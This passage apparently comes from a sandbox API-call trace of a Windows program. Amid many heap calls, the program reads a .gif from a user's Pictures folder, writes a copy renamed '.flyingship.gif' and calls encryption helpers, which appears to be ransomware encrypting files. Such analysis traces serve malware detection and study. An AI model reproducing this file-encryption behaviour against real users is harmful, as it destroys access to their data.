hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.486] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0188.486] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0188.486] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0188.487] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0188.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0188.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0188.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0188.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0188.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0188.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0188.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cczf5rk8bht5t.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.489] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.489] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0188.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0188.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0188.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0188.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0188.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.489] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0188.489] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0188.489] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0188.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0188.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0188.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0188.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0188.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0188.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0188.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.flyingship.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cczf5rk8bht5t.flyingship.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0188.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0188.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.493] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0188.494] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.494] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0188.494] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0188.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0188.494] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0188.494] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0188.498] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x5d8a, lpOverlapped=0x0) returned 1 [0188.499] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0188.501] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0188.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0188.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0188.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0188.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15d8a) returned 0xbea018 [0188.502] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0188.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0188.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.502] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0188.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0188.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.502] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0188.503] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0188.503] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0188.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.503] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0188.503] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0188.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0188.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0188.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0188.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0188.504] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0188.504] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0188.505] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.505] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.505] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0188.505] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.505] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2758, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2758*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0188.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0188.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0188.506] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0188.506] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.506] 